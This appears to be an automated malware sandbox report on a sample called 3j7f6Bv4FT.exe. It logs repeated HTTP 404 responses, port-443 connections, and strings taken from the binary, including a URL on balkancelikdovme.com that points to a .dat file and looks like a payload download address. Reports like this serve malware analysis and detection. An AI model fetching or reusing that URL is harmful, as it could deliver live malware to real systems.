Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:29 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:29 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:30 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:31 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:32 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:33 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:34 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:35 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:36 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:36 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:37 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:38 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:39 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:40 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:41 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:42 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:43 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:44 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:45 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:46 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:47 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:47 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:48 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:49 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:50 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:51 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:52 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:53 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 10 Jan 2025 22:07:54 GMTvary: User-Agent
Source: 3j7f6Bv4FT.exe, 00000000.00000002.3577970719.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 3j7f6Bv4FT.exe, 00000000.00000002.3577970719.0000000003351000.00000004.00000800.00020000.00000000.sdmp, 3j7f6Bv4FT.exe, 00000000.00000002.3579878832.0000000006845000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com
Source: 3j7f6Bv4FT.exeString found in binary or memory: https://balkancelikdovme.com/eyiiam/Ryfuqzdi.dat
Source: 3j7f6Bv4FT.exe, 00000000.00000002.3579878832.0000000006845000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/eyiiam/Ryfuqzdi.datd
Source: 3j7f6Bv4FT.exe, 00000000.00000002.3577970719.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/eyiiam/Ryfuqzdi.dattocqt55
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50202 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50205
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50204
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50207
Source: unknownNetwork traffic detected: HTTP traffic on port 50196 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50208
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50200
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50202
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50184
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50187
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50191
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50193
Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50192
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50194
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50197
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50196
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50199
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50198
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
